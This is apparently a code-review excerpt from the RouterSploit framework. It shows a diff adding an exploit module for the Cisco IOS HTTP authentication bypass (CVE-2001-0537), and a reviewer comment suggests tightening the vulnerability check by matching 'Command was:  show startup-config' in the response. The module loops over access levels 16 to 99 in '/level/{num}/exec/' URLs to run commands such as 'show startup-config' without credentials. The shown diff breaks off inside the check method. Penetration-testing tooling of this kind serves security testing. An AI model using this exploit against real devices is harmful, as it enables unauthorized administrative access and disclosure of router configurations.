routersploit/modules/exploits/cisco/cisco_ios_http_authorization_bypass.py

```diff
@@ -0,0 +1,59 @@
+from routersploit import (
+    exploits,
+    print_success,
+    print_error,
+    print_info,
+    http_request,
+    validators,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    This exploit targets a vulnerability in the Cisco IOS HTTP Server.
+    By sending a GET request for the url  "http://ip_address/level/{num}/exec/..",
+    it is possible to bypass authentication and execute any command.
+    Example: http://10.0.0.1/level/99/exec/show/startup/config
+    """
+    __info__ = {
+        'name': 'Cisco IOS HTTP Unauthorized Administrative Access',
+        'description': 'HTTP server for Cisco IOS 11.3 to 12.2 allows attackers '
+                       'to bypass authentication and execute arbitrary commands, '
+                       'when local authorization is being used, by specifying a high access level in the URL.',
+        'authors': [
+            'Author', 'Renos Stoikos rstoikos[at]gmail.com'  # routesploit module
+        ],
+        'references': [
+            'http://www.cvedetails.com/cve/cve-2001-0537',
+        ],
+        'devices': [
+            ' IOS 11.3 -> 12.2 are reportedly vulnerable.',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
+    port = exploits.Option(80, 'Target port')  # default port
+    show_command = exploits.Option('show startup-config', 'Command to be executed e.g show startup-config')
+
+    def check(self):
+        for num in range(16, 100):
+            url = "{}:{}/level/{}/exec/-/{}".format(self.target, self.port, num, self.show_command)
+            response = http_request(method="GET", url=url)
+            if response.status_code == 200:
```

Comment:
This should be more specific, there a lot of routers with http servers that return 200 for all requests.
Try to find something specific in the response. For example:
```python
if response is not None and response.status_code == 200 and "Command was:  show startup-config" in response.text:
(..)
```